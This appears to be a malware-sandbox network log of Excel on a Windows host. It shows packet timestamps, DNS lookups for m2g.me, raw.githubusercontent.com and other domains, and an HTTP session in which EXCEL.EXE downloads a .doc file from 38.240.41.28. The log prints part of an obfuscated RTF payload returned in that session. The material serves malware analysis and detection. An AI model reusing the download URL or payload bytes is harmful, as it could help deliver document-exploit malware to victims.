                                                                                                                                                                                      Oct 7, 2024 07:15:01.750011921 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750030994 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750174046 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750200033 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750216007 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750231981 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750247002 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750263929 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750278950 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750296116 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750312090 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750540018 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750555992 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750572920 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750734091 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750802040 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750818014 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750919104 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750936985 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750952959 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.750969887 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751091957 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751107931 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751135111 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751151085 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751166105 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751188993 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751205921 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751219988 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751236916 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751508951 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751526117 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751542091 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751661062 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751698971 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751698971 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751717091 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.751717091 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833535910 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833595991 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833616018 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833684921 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833735943 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833765984 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833798885 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833847046 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833874941 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833908081 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833942890 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833965063 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.833997011 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834032059 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834053040 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834104061 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834139109 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834161043 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834213018 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834254026 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834286928 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834312916 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834345102 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834399939 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834415913 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834446907 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834480047 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834502935 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834534883 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834568977 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834608078 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834640980 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834688902 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834713936 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834747076 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834795952 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834815979 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834853888 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834886074 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834908962 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834942102 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.834999084 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835016966 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835048914 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835083008 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835104942 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835135937 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835170031 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835191965 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835222006 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835253954 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835288048 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835320950 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835354090 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835376024 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835454941 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835488081 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835525036 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835547924 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835578918 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835611105 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835640907 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835666895 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835700035 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835721970 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835752964 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835786104 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835807085 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835839987 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835870981 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835892916 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835926056 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835958004 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.835983038 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.836014032 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.836049080 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.836069107 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.836101055 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.836143017 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.836158037 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.836193085 CEST804917438.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:01.836249113 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:15:01.930304050 CEST4917480192.168.2.2238.240.41.28
                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                      Oct 7, 2024 07:14:30.547029972 CEST5456253192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:30.559530020 CEST53545628.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.773680925 CEST5291753192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:33.791295052 CEST53529178.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:35.640414000 CEST6275153192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:35.647218943 CEST53627518.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:35.648960114 CEST5789353192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:35.667306900 CEST53578938.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:40.497152090 CEST5482153192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:40.505467892 CEST53548218.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:40.506874084 CEST5471953192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:40.513639927 CEST53547198.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:42.459716082 CEST4988153192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:42.471745014 CEST53498818.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:42.477757931 CEST5499853192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:42.484801054 CEST53549988.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:44.310453892 CEST5278153192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:44.318345070 CEST53527818.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:44.319783926 CEST6392653192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:44.327241898 CEST53639268.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:55.811409950 CEST6551053192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:55.823476076 CEST6267253192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:55.929138899 CEST53655108.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:55.929358959 CEST6551053192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:55.929913044 CEST53626728.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:55.931864977 CEST5647553192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:55.936041117 CEST53655108.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:55.948865891 CEST53564758.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:57.760611057 CEST4938453192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:57.769392014 CEST53493848.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:57.771194935 CEST5484253192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:14:57.778142929 CEST53548428.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:15:46.275257111 CEST5810553192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:15:46.297180891 CEST53581058.8.8.8192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:16:06.317768097 CEST6492853192.168.2.228.8.8.8
                                                                                                                                                                                      Oct 7, 2024 07:16:06.356688023 CEST53649288.8.8.8192.168.2.22
                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                      Oct 7, 2024 07:14:30.547029972 CEST192.168.2.228.8.8.80x5ea7Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:33.773680925 CEST192.168.2.228.8.8.80x5709Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:35.640414000 CEST192.168.2.228.8.8.80x7671Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:35.648960114 CEST192.168.2.228.8.8.80x75c0Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:40.497152090 CEST192.168.2.228.8.8.80xc083Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:40.506874084 CEST192.168.2.228.8.8.80x1100Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:42.459716082 CEST192.168.2.228.8.8.80xb6ecStandard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:42.477757931 CEST192.168.2.228.8.8.80xd97eStandard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:44.310453892 CEST192.168.2.228.8.8.80x9c5bStandard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:44.319783926 CEST192.168.2.228.8.8.80x4189Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.811409950 CEST192.168.2.228.8.8.80xfe30Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.823476076 CEST192.168.2.228.8.8.80x2383Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.929358959 CEST192.168.2.228.8.8.80xfe30Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.931864977 CEST192.168.2.228.8.8.80x99e0Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:57.760611057 CEST192.168.2.228.8.8.80x98abStandard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:57.771194935 CEST192.168.2.228.8.8.80x9b37Standard query (0)m2g.meA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:15:46.275257111 CEST192.168.2.228.8.8.80x58f7Standard query (0)www.my-tournament.liveA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:16:06.317768097 CEST192.168.2.228.8.8.80xa59fStandard query (0)www.senior-dating-73474.bondA (IP address)IN (0x0001)false
                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                      Oct 7, 2024 07:14:30.559530020 CEST8.8.8.8192.168.2.220x5ea7No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:33.791295052 CEST8.8.8.8192.168.2.220x5709No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:35.647218943 CEST8.8.8.8192.168.2.220x7671No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:35.667306900 CEST8.8.8.8192.168.2.220x75c0No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:40.505467892 CEST8.8.8.8192.168.2.220xc083No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:40.513639927 CEST8.8.8.8192.168.2.220x1100No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:42.471745014 CEST8.8.8.8192.168.2.220xb6ecNo error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:42.484801054 CEST8.8.8.8192.168.2.220xd97eNo error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:44.318345070 CEST8.8.8.8192.168.2.220x9c5bNo error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:44.327241898 CEST8.8.8.8192.168.2.220x4189No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.929138899 CEST8.8.8.8192.168.2.220xfe30No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.929138899 CEST8.8.8.8192.168.2.220xfe30No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.929138899 CEST8.8.8.8192.168.2.220xfe30No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.929138899 CEST8.8.8.8192.168.2.220xfe30No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.929913044 CEST8.8.8.8192.168.2.220x2383No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.936041117 CEST8.8.8.8192.168.2.220xfe30No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.936041117 CEST8.8.8.8192.168.2.220xfe30No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.936041117 CEST8.8.8.8192.168.2.220xfe30No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.936041117 CEST8.8.8.8192.168.2.220xfe30No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:55.948865891 CEST8.8.8.8192.168.2.220x99e0No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:57.769392014 CEST8.8.8.8192.168.2.220x98abNo error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:14:57.778142929 CEST8.8.8.8192.168.2.220x9b37No error (0)m2g.me14.194.50.211A (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:15:46.297180891 CEST8.8.8.8192.168.2.220x58f7Name error (3)www.my-tournament.livenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                      Oct 7, 2024 07:16:06.356688023 CEST8.8.8.8192.168.2.220xa59fName error (3)www.senior-dating-73474.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                      • m2g.me
                                                                                                                                                                                      • raw.githubusercontent.com
                                                                                                                                                                                      • 38.240.41.28
                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      0192.168.2.224916238.240.41.28803524C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Oct 7, 2024 07:14:32.186718941 CEST486OUTGET /333/erf/sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords.doc HTTP/1.1
                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                      Host: 38.240.41.28
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031301022 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:32 GMT
                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                                                      Last-Modified: Mon, 07 Oct 2024 01:19:01 GMT
                                                                                                                                                                                      ETag: "1c07d-623d8ce48b2ee"
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Content-Length: 114813
                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: application/msword
                                                                                                                                                                                      Data Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 68 4f 34 30 6c 52 53 55 64 41 59 5a 53 65 54 7a 75 52 6f 31 76 4c 57 72 68 4a 33 45 79 66 6c 36 59 57 59 73 35 5a 69 67 32 78 41 75 7a 54 69 36 38 37 6f 7a 34 65 4f 73 6e 67 31 37 77 6d 47 33 4f 78 4e 30 77 50 39 66 4a 4f 33 65 58 55 66 49 4d 32 48 6e 7a 72 6f 56 47 41 75 55 69 6d 4e 50 46 62 6f 57 70 4c 55 36 55 4f 56 77 65 34 37 45 62 38 57 61 45 4e 59 51 38 66 7a 57 6f 33 73 71 39 4e 39 62 49 6e 5a 65 61 72 6e 79 72 65 73 5a 75 49 6d 56 4b 63 4f 47 54 34 5a 4c 6b 32 59 7a 37 41 66 50 73 41 38 79 65 68 44 73 66 64 67 78 49 52 4e 69 6d 79 37 69 47 4b 75 37 34 36 43 57 43 73 65 34 36 71 79 68 68 6f 32 6f 64 50 4b 33 6f 54 59 4d 39 71 57 4f 5a 49 7d 0d 0d 7b 5c 37 30 36 34 30 34 30 38 35 a7 37 37 3f 2e 32 7c 3d 25 30 a7 32 2b 3f 3b a7 25 26 31 25 34 5d 25 3c 3f 3e 3a 3f 2a 36 3f 2b 29 26 33 3f 5e 3f 21 34 25 30 b0 25 3f 30 2f 30 5d 39 34 3a 39 2f 24 2e 2b 3d 32 21 2f 3f 29 3b 27 23 36 2d 3f 5d 36 60 33 3f 34 2b 3f 2b 2c 2d 34 5e 5f 23 31 25 39 29 39 39 2e 5e a7 30 [TRUNCATED]
                                                                                                                                                                                      Data Ascii: {\rtf1{\*\hO40lRSUdAYZSeTzuRo1vLWrhJ3Eyfl6YWYs5Zig2xAuzTi687oz4eOsng17wmG3OxN0wP9fJO3eXUfIM2HnzroVGAuUimNPFboWpLU6UOVwe47Eb8WaENYQ8fzWo3sq9N9bInZearnyresZuImVKcOGT4ZLk2Yz7AfPsA8yehDsfdgxIRNimy7iGKu746CWCse46qyhho2odPK3oTYM9qWOZI}{\70640408577?.2|=%02+?;%&1%4]%<?>:?*6?+)&3?^?!4%0%?0/0]94:9/$.+=2!/?);'#6-?]6`3?4+?+,-4^_#1%9)99.^0:'(*&$%(`)?!%'%[?&6;)?9|@3|23??9?>%!+?~?,;*.?|*^?7-2]#.2$^&~,(_<<[?,'4%<.5]/;10>>%5?97`,&%,%2!3(?]?(,9>|?5:),!..21?[.~-?</`=|%@,;>1=5'39/???9<'343.4!?.5?`_%(5:|6?&/*??>@~#]+64^|!8/82#11'*27[?1?);')7|?#:%[>|<'4*#[97.^?'|$%?$]??<0%,!?6~>2?@-?:/?=.+31?6;+<%@*~?+'0![48(-@]|?<.*7?_&%[%?'@;<);)759<&:;>8`><:8?/&$_?=95-4%-?]/>$?(<[%?>[/>&?^<1+[@44882%`@0&-28==?![_.>+%&#9-%9>.'%[?%%63['4?!3&%'^=@%?(_]'?=_(')?^@?*8_?>;&-6,=-26/86^%9||-^6?>`4!$|)7],%[#_2,#~_:^/;;&?^!'8?<>?84>%:>!;~4.6#|?&#9:2^-+:'?9($*64+4:>2,??6@3*,)492@?#3?[?$`4#$4~3(]:?
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031332016 CEST224INData Raw: 3d 5d 3b b5 3f 25 25 2b 30 2c 40 3f b5 39 3a 26 b0 25 b0 38 3e 2c 39 3f 5d 2b 39 28 2a 3f 40 b5 3f 29 37 2e 35 30 5f 31 2a 30 2b 34 29 3f 23 2f 21 3a 3a 25 25 40 24 b5 2b 3f 26 3d 25 2a 3b 31 23 35 3b 3c 37 3f 2c 7e 3f 7e 5f 5e 40 7c 3f 38 24 3f
                                                                                                                                                                                      Data Ascii: =];?%%+0,@?9:&%8>,9?]+9(*?@?)7.50_1*0+4)?#/!::%%@$+?&=%*;1#5;<7?,~?~_^@|?8$?%^21.)62)^?[?6^(>?+>?%1<`%%)`-??4'(])~|'$6:]66=^%2?'.8?%2[>;2`]$?%!)?,6_?'29(]?%@9%7?9:=??-#5`>@%=2<:)`@0)=[&$-<:????,0?=)^|~^*1<$^,,
